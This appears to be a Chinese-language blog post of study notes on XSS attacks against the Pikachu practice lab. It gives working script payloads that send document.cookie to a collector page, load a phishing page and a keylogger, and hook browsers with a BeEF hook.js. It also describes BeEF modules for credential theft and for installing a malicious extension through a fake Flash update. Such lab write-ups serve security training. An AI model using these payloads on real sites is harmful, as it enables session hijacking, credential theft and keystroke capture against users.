赞
踩
修改输入长度:F12
payload1:<script>document.location='http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?
cookie='+document.cookie;</script>
带着当前网站(pikachu)的cookie访问攻击者接受cookie的网站(psxss),(psxss)记录cookie并回到pikachu
payload2:http://localhost/pikachu/vul/xss/xss_reflected_get.php?message=<script>
document.location='http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?
cookie='+document.cookie;</script>&
submit=submit
pikachu具有xss漏洞,当用户登录pikachu时,再去访问"127.0.0.1/pikachu/pkxss/xcookie/post.html"时,就会八cookie发送给攻击者
钓鱼
<script src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php"></script>
键盘记录
<script src="http://127.0.0.1/pikachu/pkxss/rkeypress/rk.js"></script>
xssplatform
kali beef-xss
随着对针对客户端(包括移动客户端)的 Web 传播攻击的担忧日益增加,BeEF 允许专业渗透测试人员使用客户端攻击向量来评估目标环境的实际安全态势。与其他安全框架不同,BeEF 超越了强化的网络边界和客户端系统,并在一扇敞开的门(Web 浏览器)的上下文中检查可利用性。BeEF 将钩住一个或多个 Web 浏览器,并将它们用作滩头阵地,从浏览器上下文中启动定向命令模块和对系统的进一步攻击。
钩子:
http://192.168.11.131:3000/hook.js
payload:
<script src="http://192.168.11.131:3000/hook.js"></script>
pikachu输入钩子,嵌入了代码中
beef中收到
detail: 浏览器、插件版本信息,操作系统信息
logs:浏览器动作:焦点变化,鼠标单击,信息输入
commands:利用模块
简单的攻击往往是最有效的攻击。BeEF 附带了几个命令模块,这些模块为目标提供了请求凭据的熟悉接口:
一个漂亮的盗窃弹出模板:
存在许多 BeEF 模块,允许您重定向到外部页面:
使用 BeEF 可以让用户安装恶意浏览器扩展:
Fake Flash Update 模块会提示挂钩浏览器的用户安装 Flash 更新。将安装一个浏览器扩展,而不是安装 Flash 更新,该扩展可以与 BeEF 通信并提供对比默认可用信息多得多的信息的访问。
BeEF 包含一个模块,该模块可在挂钩的浏览器中启用点击劫持攻击:
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。